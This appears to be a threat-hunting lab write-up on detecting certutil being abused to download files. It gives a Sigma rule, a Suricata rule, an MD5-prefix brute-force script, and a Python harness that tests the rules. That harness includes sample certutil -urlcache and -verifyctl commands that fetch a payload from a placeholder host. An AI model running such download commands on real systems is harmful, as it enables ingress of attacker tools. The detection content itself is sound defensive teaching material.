# 3. Threat Hunting. Analysis of attacker actions

## 3.1 Event-based detection. Sigma syntax.

```yaml=
title: Certutil download command
id: 8153c26e-8f54-424c-bc7d-7b993dca2c83
status: experimental
description: Detects a suspicious certutil command used to download files
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
    - https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil
author: Oleg Zhulin
date: 2022/09/30
modified: 2022/10/02
tags:
    - attack.command_and_control
    - attack.ingress_tool_transfer
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection1:
        Image|endswith: '\certutil.exe'
        CommandLine|contains|all:
            - '-f'
            - '-urlcache'
            - '-split'
    selection2:
        Image|endswith: '\certutil.exe'
        CommandLine|contains|all:
            - '-verifyctl'
            - '-f'
            - '-split'
    condition: selection1 or selection2
falsepositives:
    - unknown
level: medium
```

## 3.2 Network detection. Suricata syntax

```shell=
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Certutil download command"; content:"GET"; http_method; content:"Certutil URL Agent"; http_user_agent; sid:100001; rev:1; metadata:created_at 2022_09_30, updated_at 2022_10_02;)
```

## 3.3 Program for generating an md5 hash matching a pattern

```python=
import hashlib


def get_hash_with_pattern(start_pattern):
    """Brute-force the smallest non-negative integer whose decimal string
    has an MD5 digest (hex) that starts with start_pattern."""
    result = {}
    current_codes_symbols = 0
    while True:
        text_string = str(current_codes_symbols)
        current_hash = hashlib.md5(text_string.encode('ascii')).hexdigest()
        # Compare the hex prefix of the digest with the requested pattern
        if current_hash.startswith(start_pattern):
            result['text_string'] = text_string
            result['md5_hash'] = current_hash
            break
        current_codes_symbols += 1
    return result


if __name__ == "__main__":
    print(get_hash_with_pattern("afed"))
```
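To see how the two rules from sections 3.1 and 3.2 actually fire, here is an added worked example (not part of the original page and not the Sigma or Suricata engines themselves). It re-implements just the pieces of matching semantics the rules use: Sigma's case-insensitive `endswith` and `contains|all` modifiers with the `selection1 or selection2` condition, and the Suricata `http_method` / `http_user_agent` sticky buffers with case-sensitive `content` matches. The process-creation events and HTTP requests are constructed samples; the `example.invalid` host and file paths are placeholders.

```python
from typing import Dict, List

# --- Section 3.1: the Sigma detection block, mirrored as a Python dict (constructed) ---
RULE_DETECTION = {
    "selection1": {
        "Image|endswith": r"\certutil.exe",
        "CommandLine|contains|all": ["-f", "-urlcache", "-split"],
    },
    "selection2": {
        "Image|endswith": r"\certutil.exe",
        "CommandLine|contains|all": ["-verifyctl", "-f", "-split"],
    },
}


def field_matches(value: str, modifiers: List[str], expected) -> bool:
    """Evaluate one Sigma field/modifier pair. Sigma string matching is
    case-insensitive by default, so both sides are lower-cased."""
    value = value.lower()
    if "endswith" in modifiers:
        return value.endswith(expected.lower())
    if "contains" in modifiers:
        needles = expected if isinstance(expected, list) else [expected]
        hits = [n.lower() in value for n in needles]
        return all(hits) if "all" in modifiers else any(hits)
    return value == str(expected).lower()  # plain equality, no modifier


def selection_matches(event: Dict[str, str], selection: Dict) -> bool:
    """All field conditions inside one selection are ANDed."""
    for key, expected in selection.items():
        field, *modifiers = key.split("|")
        if not field_matches(event.get(field, ""), modifiers, expected):
            return False
    return True


def sigma_rule_matches(event: Dict[str, str]) -> bool:
    """condition: selection1 or selection2"""
    sel = {name: selection_matches(event, s) for name, s in RULE_DETECTION.items()}
    return sel["selection1"] or sel["selection2"]


# Constructed Sysmon-style process_creation events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/p.bin C:\Users\Public\p.bin"},
    {"Image": r"C:\Windows\System32\CERTUTIL.EXE",
     "CommandLine": r"certutil -verifyctl -f -split http://example.invalid/ctl.stl"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256"},
    {"Image": r"C:\Program Files\Git\bin\curl.exe",
     "CommandLine": r"curl.exe -f -s http://example.invalid/"},
]


def evaluate_events(events: List[Dict[str, str]]) -> List[bool]:
    return [sigma_rule_matches(e) for e in events]


# --- Section 3.2: the Suricata rule's HTTP conditions, re-implemented ---
def suricata_rule_matches(raw_request: bytes) -> bool:
    """content:"GET"; http_method;  content:"Certutil URL Agent"; http_user_agent;
    Suricata content matches are case-sensitive unless 'nocase' is given."""
    head, _, _ = raw_request.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method = request_line.split(b" ", 1)[0]
    headers: Dict[bytes, bytes] = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()  # header names are case-insensitive
    user_agent = headers.get(b"user-agent", b"")
    return method == b"GET" and b"Certutil URL Agent" in user_agent


# Constructed HTTP requests (not captured traffic).
REQUEST_CERTUTIL = (
    b"GET /p.bin HTTP/1.1\r\n"
    b"Host: example.invalid\r\n"
    b"User-Agent: Certutil URL Agent\r\n"
    b"Connection: Keep-Alive\r\n\r\n"
)
REQUEST_BROWSER = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: example.invalid\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0) Firefox/105.0\r\n\r\n"
)
REQUEST_POST = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: example.invalid\r\n"
    b"User-Agent: Certutil URL Agent\r\n"
    b"Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    print(evaluate_events(SAMPLE_EVENTS))          # [True, True, False, False]
    print([suricata_rule_matches(r) for r in (REQUEST_CERTUTIL, REQUEST_BROWSER, REQUEST_POST)])
```

Two points the run makes visible: the second event matches even though `Image` is upper-cased, because Sigma comparisons are case-insensitive, while the third `POST` request does not fire the Suricata rule despite the matching User-Agent, because every `content` in the rule must match in its own buffer. The `-hashfile` invocation shows the value of `contains|all` over a bare `contains '-f'`: a single short substring like `-f` would be far noisier on its own.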